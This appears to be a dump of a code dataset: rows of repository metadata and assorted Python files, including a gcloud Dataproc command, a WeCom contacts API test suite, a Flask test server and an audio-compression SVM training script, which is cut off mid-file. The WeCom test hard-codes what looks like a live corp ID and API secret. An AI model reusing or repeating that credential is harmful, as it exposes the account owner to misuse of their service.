blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
288
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 684
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 147
values | src_encoding
stringclasses 25
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 128
12.7k
| extension
stringclasses 142
values | content
stringlengths 128
8.19k
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
ed515808184c081c4fe7c811731cae8cc21cb5fd
|
c97b9ae1bf06757ba61f90905e4d9b9dd6498700
|
/venv/Lib/site-packages/imantics/annotation.py
|
5535c91b19b0b5a735786a01eb14c20edbc7670d
|
[] |
no_license
|
Rahulk1p/image-processor
|
f7ceee2e3f66d10b2889b937cdfd66a118df8b5d
|
385f172f7444bdbf361901108552a54979318a2d
|
refs/heads/main
| 2023-03-27T10:09:46.080935
| 2021-03-16T13:04:02
| 2021-03-16T13:04:02
| 348,115,443
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 130
|
py
|
version https://git-lfs.github.com/spec/v1
oid sha256:4337ed1406db4375634044a08344b5e77cd0331e135f6356cd1b5ece79d71b35
size 27249
|
[
"rksc.k1p@gmail.com"
] |
rksc.k1p@gmail.com
|
2c1962938cf8bb8b5efd4e2c67d5f4f15c221da2
|
d842a95213e48e30139b9a8227fb7e757f834784
|
/gcloud/google-cloud-sdk/lib/surface/dataproc/jobs/update.py
|
749d26147d72d4fcd856c79801bef8d5f2eb664d
|
[
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0",
"MIT"
] |
permissive
|
bopopescu/JobSniperRails
|
f37a15edb89f54916cc272884b36dcd83cdc868a
|
39e7f871887176770de0f4fc6789e9ddc7f32b1f
|
refs/heads/master
| 2022-11-22T18:12:37.972441
| 2019-09-20T22:43:14
| 2019-09-20T22:43:14
| 282,293,504
| 0
| 0
|
MIT
| 2020-07-24T18:47:35
| 2020-07-24T18:47:34
| null |
UTF-8
|
Python
| false
| false
| 2,865
|
py
|
# -*- coding: utf-8 -*- #
# Copyright 2017 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Update job command."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from googlecloudsdk.api_lib.dataproc import dataproc as dp
from googlecloudsdk.api_lib.dataproc import util
from googlecloudsdk.calliope import base
from googlecloudsdk.command_lib.dataproc import flags
from googlecloudsdk.command_lib.util.args import labels_util
from googlecloudsdk.core import log
class Update(base.UpdateCommand):
  """Update the labels for a job.
  Update the labels for a job.
  ## EXAMPLES
  To add the label 'customer=acme' to a job , run:
  $ {command} job_id --update-labels=customer=acme
  To update the label 'customer=ackme' to 'customer=acme', run:
  $ {command} job_id --update-labels=customer=acme
  To remove the label whose key is 'customer', run:
  $ {command} job_id --remove-labels=customer
  """

  @staticmethod
  def Args(parser):
    # Job positional argument plus a required group for the label flags.
    flags.AddJobFlag(parser, 'update')
    label_changes = parser.add_argument_group(required=True)
    # Allow the user to specify new labels as well as update/remove existing
    labels_util.AddUpdateLabelsFlags(label_changes)

  def Run(self, args):
    dataproc = dp.Dataproc(self.ReleaseTrack())
    job_ref = util.ParseJob(args.job, dataproc)

    # Fetch the current job so the label diff can be applied to its labels.
    get_request = dataproc.messages.DataprocProjectsRegionsJobsGetRequest(
        projectId=job_ref.projectId,
        region=job_ref.region,
        jobId=job_ref.jobId)
    job = dataproc.client.projects_regions_jobs.Get(get_request)

    # Compute the new labels value from --update-labels / --remove-labels.
    labels_diff = labels_util.Diff.FromUpdateArgs(args)
    labels_result = labels_diff.Apply(dataproc.messages.Job.LabelsValue,
                                      job.labels)

    update_mask = []
    if labels_result.needs_update:
      update_mask.append('labels')
    job.labels = labels_result.GetOrNone()

    patch_request = dataproc.messages.DataprocProjectsRegionsJobsPatchRequest(
        projectId=job_ref.projectId,
        region=job_ref.region,
        jobId=job_ref.jobId,
        job=job,
        updateMask=','.join(update_mask))
    patched_job = dataproc.client.projects_regions_jobs.Patch(patch_request)
    log.UpdatedResource(patched_job)
    return patched_job
|
[
"luizfper@gmail.com"
] |
luizfper@gmail.com
|
f4ea20b4c2b18eb379561c51c45e1ffce98af783
|
2a4432ce7d738b3670e07841d211689e3b4b19c0
|
/code/01-basics/lists-03.py
|
08a8627f70507e10491153f1609d272bc74a84cb
|
[] |
no_license
|
avdata99/programacion-para-no-programadores
|
3f9ebba212fb1401bf5bba3befc394f4017d1de6
|
cb2405a6789535aa0c276b43116adb22b2c24a54
|
refs/heads/master
| 2022-12-14T10:18:23.523639
| 2022-11-29T00:55:14
| 2022-11-29T00:55:14
| 144,493,639
| 6
| 2
| null | 2022-11-17T23:53:47
| 2018-08-12T19:07:15
|
Python
|
UTF-8
|
Python
| false
| false
| 1,156
|
py
|
# Teaching script: basic Python list operations on a list of surnames.
# The comments following each print() quote the expected (Spanish) console
# output verbatim, so they are left untranslated on purpose.
apellidos = ["gonzalez", "gomez", "rodriguez", "lopez", "garcia"]
total_apellidos = len(apellidos)
print(f'Total de apellidos: {total_apellidos}')
# Total de apellidos: 5

# Indexing: first element (index 0) and last element (index -1).
primer_apellido = apellidos[0]
print(f'El primer apellido es: {primer_apellido}')
# El primer apellido es: gonzalez
ultimo_apellido = apellidos[-1]
print(f'El último apellido es: {ultimo_apellido}')
# El último apellido es: garcia

# Slicing: the first two and the last two elements.
primeros_2 = apellidos[0:2]
print(f'Los primeros dos: {primeros_2}')
# Los primeros dos: ['gonzalez', 'gomez']
ultimos_2 = apellidos[-2:]
print(f'Los últimos dos son: {ultimos_2}')
# Los últimos dos son: ['lopez', 'garcia']

# Remove a specific element by value.
apellidos.remove("lopez")
# Remove the first element by index.
del apellidos[0]
# Remove and return the removed element.
primer_elemento = apellidos.pop(0)
print(f'El primero era: {primer_elemento} y ahora es {apellidos[0]}')
# El primero era: gomez y ahora es rodriguez

# Sort in place (ascending).
apellidos.sort()
print(f'Lista ordenada: {apellidos}')
# Lista ordenada: ['garcia', 'rodriguez']
# Reverse the order in place.
apellidos.reverse()
print(f'Lista invertida: {apellidos}')
# Lista invertida: ['rodriguez', 'garcia']
|
[
"andres@data99.com.ar"
] |
andres@data99.com.ar
|
7b3cdaf3ccf1f5c613858afc5c0fa5a59173d639
|
2bb90b620f86d0d49f19f01593e1a4cc3c2e7ba8
|
/pardus/playground/mehmet/trinity/base/kdenetwork/actions.py
|
19635dd1b8448712d3dda9394fabfd51056431d3
|
[] |
no_license
|
aligulle1/kuller
|
bda0d59ce8400aa3c7ba9c7e19589f27313492f7
|
7f98de19be27d7a517fe19a37c814748f7e18ba6
|
refs/heads/master
| 2021-01-20T02:22:09.451356
| 2013-07-23T17:57:58
| 2013-07-23T17:57:58
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,547
|
py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2005-2010 TUBITAK/UEKAE
# Licensed under the GNU General Public License, version 2.
# See the file http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
from pisi.actionsapi import kde
from pisi.actionsapi import get
from pisi.actionsapi import pisitools
from pisi.actionsapi import shelltools
# pisi build metadata: keep libtool archives instead of pruning them.
KeepSpecial=["libtool"]
# Some build tooling writes into $HOME; point it at the pisi work directory.
shelltools.export("HOME", get.workDIR())
# Sources unpack into a directory named after the source package.
WorkDir = "%s" % get.srcNAME()
def setup():
    """Patch the kdenetwork build scripts and run configure."""
    # Fix automake and python detection.  The dosed() patterns are sed
    # regexes; use raw strings so the backslashes reach sed intact instead
    # of being Python escape sequences ("\*" and "\." are invalid escapes
    # and raise warnings on modern Python).
    pisitools.dosed("admin/cvs.sh", r"automake\*1\.10\*", "automake*1.1[0-5]*")
    pisitools.dosed("admin/acinclude.m4.in",
                    r"KDE_CHECK_PYTHON_INTERN\(\"2.5",
                    "KDE_CHECK_PYTHON_INTERN(\"%s" % get.curPYTHON().split("python")[1])
    kde.make("-f admin/Makefile.common")
    # Skip subprojects we do not ship (docs are handled in install()).
    shelltools.export("DO_NOT_COMPILE", "ksirc wifi lanbrowsing")
    kde.configure("--with-slp \
--with-wifi \
--disable-sametime-plugin \
--without-xmms \
--without-external-libgadu")
def build():
    """Compile via the pisi KDE actions API (runs make)."""
    kde.make()
def install():
    """Install into the package image and prune files we do not ship."""
    kde.install()
    pisitools.dodir("/etc")
    # lisa expects its (possibly empty) config file to exist at runtime.
    shelltools.touch("%s/etc/lisarc" % get.installDIR())
    # We replace this file
    pisitools.remove("/usr/kde/3.5/share/apps/konqueror/servicemenus/kget_download.desktop")
    #pisitools.insinto("/etc/ppp/peers", "kppp_peers", "kppp")
    # DO_NOT_COMPILE doesn't cover docs
    pisitools.removeDir ("/usr/kde/3.5/share/doc/HTML/en/ksirc/")
    pisitools.removeDir ("/usr/kde/3.5/share/doc/HTML/en/kwifimanager/")
|
[
"yusuf.aydemir@istanbul.com"
] |
yusuf.aydemir@istanbul.com
|
3e98aa2b893184dcc8212f0ed3f0280ba18d4a70
|
5f845ebbc2c9b40eea702833c91928ae90ae7ee5
|
/algorithms/sansa-and-xor.py
|
c530755cda1afdf3da0b31b5a9bbdc62129a51ba
|
[
"MIT"
] |
permissive
|
imgeekabhi/HackerRank
|
7a1917fee5af01976aebb9c82aa1045a36487016
|
7fe4a308abad85ce446a28328324be480672e6fc
|
refs/heads/master
| 2022-12-28T19:13:49.098090
| 2020-10-11T09:29:08
| 2020-10-11T09:29:08
| 300,023,395
| 1
| 0
|
MIT
| 2020-09-30T18:48:12
| 2020-09-30T18:48:11
| null |
UTF-8
|
Python
| false
| false
| 443
|
py
|
#!/bin/python3
import sys
def sansaXor(arr):
    """Return the XOR of the XORs of every contiguous subarray of arr.

    The element at index i occurs in (i + 1) * (n - i) subarrays.  That
    count is even for every element when n is even (so the answer is 0),
    and odd exactly at the even indices when n is odd — so the answer is
    arr[0] ^ arr[2] ^ arr[4] ^ ...
    """
    if len(arr) % 2 == 0:
        return 0
    total = 0
    for value in arr[::2]:
        total ^= value
    return total
if __name__ == "__main__":
    # Read t test cases from stdin; each case is a count n (ignored beyond
    # parsing) followed by n space-separated integers.
    t = int(input().strip())
    for a0 in range(t):
        n = int(input().strip())
        arr = list(map(int, input().strip().split(' ')))
        result = sansaXor(arr)
        print(result)
|
[
"sergey.n.nemov@gmail.com"
] |
sergey.n.nemov@gmail.com
|
53398a65baec73f067d92879974a00c707a3553c
|
e681066a46e0b6ee27b23c9ea8ff471225e053e7
|
/email_auth/account/migrations/0002_auto_20200513_2234.py
|
37c420d45b631497c8626f62bb7b871d8785660f
|
[] |
no_license
|
arajo-hub/Test_Email-auth
|
b629108b99bcef69c072269c488cfe3217ff2c01
|
600a4923079ecff34d12c76a266ab0e21cb61cbf
|
refs/heads/master
| 2022-06-29T10:41:27.451862
| 2020-05-14T12:58:07
| 2020-05-14T12:58:07
| 263,462,773
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 875
|
py
|
# Generated by Django 3.0.6 on 2020-05-13 13:34
from django.db import migrations, models
class Migration(migrations.Migration):
    """Drop legacy user fields and default new accounts to inactive."""
    # NOTE(review): is_active now defaults to False — presumably so accounts
    # only become active after the e-mail verification flow; confirm.

    dependencies = [
        ('account', '0001_initial'),
    ]

    operations = [
        # The custom user model no longer tracks these two fields.
        migrations.RemoveField(
            model_name='user',
            name='date_joined',
        ),
        migrations.RemoveField(
            model_name='user',
            name='is_admin',
        ),
        migrations.AlterField(
            model_name='user',
            name='is_active',
            field=models.BooleanField(default=False),
        ),
        migrations.AlterField(
            model_name='user',
            name='is_superuser',
            field=models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status'),
        ),
    ]
|
[
"joara9566@naver.com"
] |
joara9566@naver.com
|
f52e7164e94f5951904433989503d2f1555eb7e7
|
4393a24ad5fbf31a59c3521ce4c66ff7d9a378bc
|
/wework/test_wework.py
|
bd605fe86d74a79775c427c23c18c0b2c3ccc461
|
[] |
no_license
|
Frecy16/learning
|
deba0abe0c326c6624456d83d3b75f06065c3834
|
a2b92f1c1dbd24bb5cc15ec9639c51aa8ca24902
|
refs/heads/master
| 2022-01-27T00:04:43.433775
| 2022-01-19T01:34:14
| 2022-01-19T01:34:14
| 210,374,068
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,809
|
py
|
# import json
# import random
import re
import pytest
import requests
def test_create_data():
    """Build 20 (userid, name, mobile) tuples to parametrize the CRUD test.

    (Original notes covered: list comprehensions, generators, iterators.)
    """
    data = []
    for index in range(20):
        userid = "weixiao" + str(index)
        name = "魏潇" + str(index)
        mobile = "152%08d" % index
        data.append((userid, name, mobile))
    print(data)
    return data
class Testwework:
    """End-to-end tests against the WeCom (企业微信) contacts API.

    Covers token retrieval plus create / read / update / delete of members.
    NOTE(review): the corp id and API secret are hard-coded below and checked
    into source control — they should be moved to configuration/environment.
    """

    @pytest.fixture(scope="session")
    def token(self):
        # Session-scoped fixture: fetch one access token for the whole run.
        requests_params = {
            "corpid": "ww1d0df80a9ad528de",
            "corpsecret": "8nQMZi5-VPcw1UjYPcOLQWA0g-VdLHNV5531pbIPrkk"
        }
        r = requests.get("https://qyapi.weixin.qq.com/cgi-bin/gettoken", params=requests_params)
        return r.json()["access_token"]

    def get_token(self):
        """Fetch an access token (older helper; superseded by the `token` fixture).

        corp id: ww1d0df80a9ad528de
        contacts API secret: 8nQMZi5-VPcw1UjYPcOLQWA0g-VdLHNV5531pbIPrkk
        url: https://qyapi.weixin.qq.com/cgi-bin/gettoken?corpid=ID&corpsecret=SECRET
        """
        payload = {
            "corpid": "ww1d0df80a9ad528de",
            "corpsecret": "8nQMZi5-VPcw1UjYPcOLQWA0g-VdLHNV5531pbIPrkk"
        }
        r = requests.get("https://qyapi.weixin.qq.com/cgi-bin/gettoken", params=payload)
        # print(r.json())
        return r.json()["access_token"]

    def test_create(self, token, userid, mobile, name="释琪", department=None):
        """Create a member.

        url: https://qyapi.weixin.qq.com/cgi-bin/user/create?access_token=ACCESS_TOKEN
        """
        # access_token = self.get_token()
        if department is None:
            department = [4]
        body = {
            "userid": userid,
            "name": name,
            "mobile": mobile,
            "department": department,
        }
        # req_body = json.dumps(body)  # dict -> JSON string; json.loads() is the inverse
        r = requests.post(f"https://qyapi.weixin.qq.com/cgi-bin/user/create?access_token={token}",
                          json=body)
        print(r.json())
        return r.json()

    def test_get_users(self, token):
        """List members of department 1 (including children)."""
        # access_token = self.get_token()
        r = requests.get(f"https://qyapi.weixin.qq.com/cgi-bin/user/simplelist?access_token={token}\
&department_id=1&fetch_child=1")
        # print(r.json())
        print(r.json()["userlist"])

    def test_getmermber(self, token, userid):
        """Fetch one member's info.

        https://qyapi.weixin.qq.com/cgi-bin/user/get?access_token=ACCESS_TOKEN&userid=USERID
        """
        # access_token = self.get_token()
        # userid = self.test_get_user(token)
        # payload = {"userid":"wangzhen"}
        r = requests.get(f"https://qyapi.weixin.qq.com/cgi-bin/user/get?access_token={token}&userid={userid}")
        return r.json()

    def test_update(self, token, userid, name="安琪", department=None, **kwargs):
        """Update a member's info.

        https://qyapi.weixin.qq.com/cgi-bin/user/update?access_token=ACCESS_TOKEN
        """
        # access_token = self.get_token()
        if department is None:
            department = [3]
        body = {
            "userid": userid,
            "name": name,
            "department": department,
            "order": [1],
            **kwargs
        }
        r = requests.post(f"https://qyapi.weixin.qq.com/cgi-bin/user/update?access_token={token}", json=body)
        return r.json()

    def test_delete(self, token, userid):
        """Delete a member.

        https://qyapi.weixin.qq.com/cgi-bin/user/delete?access_token=ACCESS_TOKEN&userid=USERID
        """
        # access_token = self.get_token()
        # self.test_create(token)
        r = requests.get(f"https://qyapi.weixin.qq.com/cgi-bin/user/delete?access_token={token}&userid={userid}")
        return r.json()

    @pytest.mark.parametrize("userid,name,mobile", test_create_data())
    def test_wework_crud(self, token, userid, mobile, name):
        """Full CRUD flow: create -> read -> update -> read -> delete -> verify gone."""
        # userid = "kenan123"
        # name = "释琪"
        # mobile = "15800000009"
        try:
            assert "created" == self.test_create(token, userid, mobile, name)["errmsg"]
        except AssertionError as e:
            # On a mobile-number conflict the API error message contains the
            # conflicting userid — delete that member and retry the create.
            if "mobile existed" in e.__str__():
                re_userid = re.findall(":(.*)'$", e.__str__())[0]
                self.test_delete(token, re_userid)
                assert "created" == self.test_create(token, userid, mobile, name)["errmsg"]
        assert name == self.test_getmermber(token, userid)["name"]
        assert "updated" == self.test_update(token, userid, name="安琪")["errmsg"]
        assert "安琪" == self.test_getmermber(token, userid)["name"]
        assert "deleted" == self.test_delete(token, userid)["errmsg"]
        # errcode 60111 (userid not found) confirms the deletion took effect.
        assert 60111 == self.test_getmermber(token, userid)["errcode"]
        # self.test_get_users(token)
|
[
"1376210796@qq.com"
] |
1376210796@qq.com
|
450c570d599fad38b19bafb4021da6c048f0d793
|
306d4c4ac51dbe13ae9fee8b3577ffc1ede53094
|
/ocelot/transformations/consequential/technology_levels.py
|
19451a83b04aea3c66e1fe1321f91acf228aa347
|
[] |
no_license
|
damanncarlos/Ocelot
|
80563c4ab4508a945a4a29b53cc3d0ba9906897d
|
20e9639570c43f84ae255750a6c402ebabe00981
|
refs/heads/master
| 2022-01-08T15:25:15.997661
| 2019-03-18T16:31:43
| 2019-03-18T16:31:43
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,009
|
py
|
# -*- coding: utf-8 -*-
from ... import toolz
from ...collection import Collection
import logging
def log_conflicting_technology_levels(data):
    """Log anytime that there are both ``undefined`` and ``current`` inputs to a market.

    The behaviour when this condition occurs is undefined. We will later
    change all technology levels with ``undefined`` to ``current``, but there
    is no general rule what to prefer if there are already ``current``
    activities in the market mix."""
    def is_transforming(ds):
        return ds['type'] == 'transforming activity'

    def has_level(datasets, level):
        return any(ds for ds in datasets if ds['technology level'] == level)

    transforming = filter(is_transforming, data)
    for product, datasets in toolz.groupby('reference product',
                                           transforming).items():
        if has_level(datasets, 'undefined') and has_level(datasets, 'current'):
            logging.info({
                'type': 'table element',
                'data': (product, len(datasets))
            })
    return data

log_conflicting_technology_levels.__table__ = {
    'title': 'Log when both ``undefined`` and ``current`` are present in a market mix',
    'columns': ["Reference product", "Number of datasets"]
}
def switch_undefined_to_current(data):
    """Rewrite ``undefined`` technology levels on transforming activities to ``current``.

    Mutates the datasets in place, logging each change as a table element.
    Returns ``data`` so calls can be chained."""
    for ds in data:
        if ds['type'] != 'transforming activity':
            continue
        if ds['technology level'] != 'undefined':
            continue
        ds['technology level'] = 'current'
        logging.info({
            'type': 'table element',
            'data': (ds['name'], ds['reference product'], ds['location'])
        })
    return data

switch_undefined_to_current.__table__ = {
    'title': 'Switch all `undefined` activity technology levels to `current`',
    'columns': ["Reference product", "Number of datasets"]
}
# Pipeline fragment: first log conflicting market mixes, then normalize
# the remaining ``undefined`` levels to ``current``.
cleanup_technology_levels = Collection(
    log_conflicting_technology_levels,
    switch_undefined_to_current,
)
|
[
"cmutel@gmail.com"
] |
cmutel@gmail.com
|
a82e1eb0f34a3bd2d043461fa04d85c621dd4cd5
|
c4c159a21d2f1ea0d7dfaa965aeff01c8ef70dce
|
/flask/flaskenv/Lib/site-packages/tensorflow/core/framework/log_memory_pb2.py
|
877be5882f2c766befdd8db5688b8069c4336556
|
[] |
no_license
|
AhsonAslam/webapi
|
54cf7466aac4685da1105f9fb84c686e38f92121
|
1b2bfa4614e7afdc57c9210b0674506ea70b20b5
|
refs/heads/master
| 2020-07-27T06:05:36.057953
| 2019-09-17T06:35:33
| 2019-09-17T06:35:33
| 208,895,450
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 130
|
py
|
version https://git-lfs.github.com/spec/v1
oid sha256:855f12f0d0944d6b927291e87424c9455e25c435568ede0a38451bc1a808da1a
size 16503
|
[
"github@cuba12345"
] |
github@cuba12345
|
3a501e957c950c05c748d009493cf36c34f4b4c1
|
48e442524807b249ec001b712716c23094d8e2ed
|
/_side_projects/client-server-request_size_experiments/ServerBlobTest.py
|
6ee7106de4955d09cc763d1125f7c5d990d410b4
|
[] |
no_license
|
BillMK/AttentionPipeline
|
a3ad4befe1b62e6d8b24b53c8db3123a8fd97bda
|
70e37142e79996e62c51c85de996127e38606efa
|
refs/heads/master
| 2022-02-26T12:13:42.754907
| 2019-10-23T22:21:26
| 2019-10-23T22:21:26
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,579
|
py
|
import evaluation_code.darkflow_handler as darkflow_handler
from keras.preprocessing.image import img_to_array
from evaluation_code.encoding import base64_decode_image
from threading import Thread
import time
from PIL import Image
import flask
import io
import os
from timeit import default_timer as timer
from multiprocessing.pool import ThreadPool
# Thanks to the tutorial at: https://blog.keras.io/building-a-simple-keras-deep-learning-rest-api.html
app = flask.Flask(__name__)
# Model handle — this size-test server never loads it, so it stays None.
darkflow_model = None
pool = ThreadPool()

# del  -- scratch/debug section below; the imports duplicate ones above
from timeit import default_timer as timer
import numpy as np
import base64
import sys
# Per-request read times accumulate here so we can print a running mean.
times_del = []
def base64_decode_image(a, dtype, shape):
    """Decode a base64-encoded serialized NumPy array.

    Args:
        a: base64 payload, a str on Python 3 (converted to bytes) or bytes.
        dtype: NumPy dtype the flat buffer was serialized with.
        shape: target shape to reshape the decoded buffer into.

    Returns:
        np.ndarray view of the decoded data with the given dtype and shape.
    """
    # if this is Python 3, we need the extra step of encoding the
    # serialized NumPy string as a byte object
    if sys.version_info.major == 3:
        a = bytes(a, encoding="utf-8")
    # convert the string to a NumPy array using the supplied data
    # type and target shape.  base64.decodestring() was removed in
    # Python 3.9; decodebytes() is the same codec under its modern name.
    a = np.frombuffer(base64.decodebytes(a), dtype=dtype)
    a = a.reshape(shape)
    # return the decoded image
    return a
class Server(object):
    """
    Server

    Constructing this object blocks: it spawns a background memory-monitor
    thread and then runs the Flask app in the current thread.
    """
    def __init__(self):
        print("Server ... starting server and loading model ... please wait until its started ...")
        # Report this process's memory usage every `frequency_sec` seconds.
        frequency_sec = 25.0
        t = Thread(target=self.mem_monitor_deamon, args=([frequency_sec]))
        t.daemon = True  # don't keep the interpreter alive on shutdown
        t.start()
        app.run()
        # On server:
        #app.run(host='0.0.0.0', port=8123)

    def mem_monitor_deamon(self, frequency_sec):
        """Loop forever, printing this process's RSS in MB (Linux `ps` based)."""
        import subprocess
        while (True):
            out = subprocess.Popen(['ps', 'v', '-p', str(os.getpid())],
                                   stdout=subprocess.PIPE).communicate()[0].split(b'\n')
            # Find the RSS column in the `ps` header, then read it for our PID.
            vsz_index = out[0].split().index(b'RSS')
            mem = float(out[1].split()[vsz_index]) / 1024
            print("Memory:", mem)
            time.sleep(frequency_sec)  # check every frequency_sec sec
@app.route("/handshake", methods=["POST"])
def handshake():
    """Connectivity check: read the 'client' file field and report timing."""
    # Handshake
    data = {"success": False}
    start = timer()
    if flask.request.method == "POST":
        if flask.request.files.get("client"):
            client_message = flask.request.files["client"].read()
            print("Handshake, received: ",client_message)
            end = timer()
            data["internal_time"] = end - start
            data["success"] = True
    # return the data dictionary as a JSON response
    return flask.jsonify(data)
@app.route("/test_request_size", methods=["POST"])
def test_request_size():
    """Measure upload sizes and read times; decode the first blob as an image."""
    # Evaluate data
    data = {"success": False}
    if flask.request.method == "POST":
        lens = []
        blobs = []
        t1 = timer()
        # Read every uploaded file field, recording each blob's byte length.
        for key in flask.request.files:
            blob = flask.request.files[key].read()
            l = len(blob)
            print("blobl length/size",l)
            lens.append(l)
            blobs.append(blob)
        t2 = timer()
        # Running mean of read times across requests (module-level list).
        times_del.append((t2-t1))
        print("reading time avg ", np.mean(times_del))
        print("trying to load it...")
        # Sanity check: decode the first blob via PIL, then to a numpy array.
        blob = blobs[0]
        print("blob : ", type(blob), blob)
        image = Image.open(io.BytesIO(blob))
        print("image : ", type(image), image)
        image = img_to_array(image)
        print("image : ", type(image), image.shape)
        data["time"] = (t2-t1)
        data["blob_lengths"] = lens
        # indicate that the request was a success
        data["success"] = True
    return flask.jsonify(data)
if __name__ == "__main__":
    # Constructing Server blocks here: it starts the monitor thread and app.run().
    server = Server()
|
[
"previtus@gmail.com"
] |
previtus@gmail.com
|
49ecb24adbd6f2b9430e2a9828ec499e8267a836
|
b627da650f75bdcf7e0dc0ef5c4419cf53a1d690
|
/src/zqh_rocc/zqh_rocc_stub.py
|
b95f9096e435d5ea53232f3bfed6a993edd861ec
|
[] |
no_license
|
Jusan-zyh/zqh_riscv
|
4aa8a4c51e19fb786ba0c2a120722f1382994a52
|
bccde2f81b42ac258b92c21bb450ec6ff848387a
|
refs/heads/main
| 2023-08-06T12:56:52.420302
| 2021-09-21T01:25:41
| 2021-09-21T01:25:41
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 452
|
py
|
import sys
import os
from phgl_imp import *
from .zqh_rocc_main import zqh_rocc_base_module
class zqh_rocc_stub(zqh_rocc_base_module):
    """RoCC (custom coprocessor) stub that drives every output inactive.

    NOTE(review): `/=` here appears to be the phgl_imp HDL framework's
    signal-assignment overload, not Python in-place division — confirm
    against zqh_rocc_base_module.
    """
    def main(self):
        # Build the base module's IO first, then tie all outputs to 0.
        super(zqh_rocc_stub, self).main()
        self.io.cmd.ready /= 0
        self.io.resp.valid /= 0
        self.io.resp.bits /= 0
        self.io.mem.req.valid /= 0
        self.io.mem.req.bits /= 0
        self.io.mem.s1_kill /= 0
        self.io.busy /= 0
        self.io.interrupt /= 0
|
[
"zhouqinghua888@163.com"
] |
zhouqinghua888@163.com
|
412d627460ca3bf78dd7d852aef36fe557ff61f5
|
1eb488aea8ca5c9dca18f110b63e4936f91f9bb6
|
/detecting_double_compression_using_lame_and_mpg123/training_models.py
|
18a19caedf3433f5feb0fb0f14df7ddf81831c91
|
[] |
no_license
|
brickgao/Audio_Detecting_Misc
|
fbd5f51a54311ceecbea8ec6069ffc6580d7830c
|
65d93597d0565042653fbb8c5d5c485524717867
|
refs/heads/master
| 2021-01-23T06:44:52.706198
| 2014-04-15T15:23:23
| 2014-04-15T15:23:23
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,362
|
py
|
# -*- coding: utf-8 -*-
import os
from libsvm.svmutil import *
# All MP3 bitrates (kbps) the sample folders could cover.
_bitrate_list = [u'8', u'16', u'24', u'32', u'40', u'48',
                 u'56', u'64', u'80', u'96', u'112', u'128',
                 u'160', u'192', u'224', u'256', u'320']
# NOTE(review): the full list above is immediately overridden, so only the
# 32 kbps folder is processed — looks like a debugging leftover; confirm.
_bitrate_list = [u'32']
# Accumulated SVM training labels (_y) and feature vectors (_x).
_y, _x = [], []
def analyse_process(_group):
    """Extract features from `data.tmp` and append one training sample.

    Parses the MDCT coefficient dump produced by the preceding encoder run,
    computes the fraction of zero coefficients plus 20 band-averaged values,
    and appends (label=_group, features) to the module-level _y/_x lists.
    Deletes tmp.wav, tmp.mp3 and data.tmp as a side effect.
    (Python 2 code: `map` returns a list here.)
    """
    os.remove(u'tmp.wav')
    os.remove(u'tmp.mp3')
    _file_in = open(u'data.tmp', 'r')
    # 20 per-band accumulators, zero-coefficient count, and frame count.
    _cnt_arr, _eq_zero, _len = [0.0 for x in range(20)], 0, 0
    try:
        # Skip the two header lines.
        for _i in range(2): _line = _file_in.readline()
        while True:
            _line = _file_in.readline()
            if _line == '': break
            if _line == '\n': continue
            _mdct_arr = map(float, _line.split(' ')[:-1])
            _len += 1
            for _e in _mdct_arr:
                if _e == 0.0: _eq_zero += 1
            # Average each of the 20 blocks of 24 MDCT coefficients.
            for _i in range(20):
                _list = _mdct_arr[_i * 24: (_i + 1) * 24]
                _cnt_arr[_i] += sum(_list) / 24.0
        # Normalize by the number of frames read.
        _eq_zero = float(_eq_zero) / float(_len)
        for i in range(20): _cnt_arr[i] /= float(_len)
        _y.append(_group)
        _x.append([_eq_zero] + _cnt_arr)
    finally:
        _file_in.close()
        os.remove(u'data.tmp')
os.remove(u'data.tmp')
# Decoder path
_decoder = os.path.abspath(u'./mpg123_decode/mpg123_to_wav.exe')
# Encoder path
_encoder = os.path.abspath(u'./lame_encode/lame.exe')

# Pass 1: label singly-compressed ("origin") files as +1.  Each file is
# decoded to tmp.wav, re-encoded at 32 kbps (which writes the MDCT dump),
# then analysed.
for _bitrate in _bitrate_list:
    _folder_path = os.path.abspath(u'F:/mp3_sample/origin/' + _bitrate)
    _file_list = os.listdir(_folder_path)
    print 'Starting analyse origin ' + str(_bitrate) + '-bitrate mp3 file'
    for _file in _file_list:
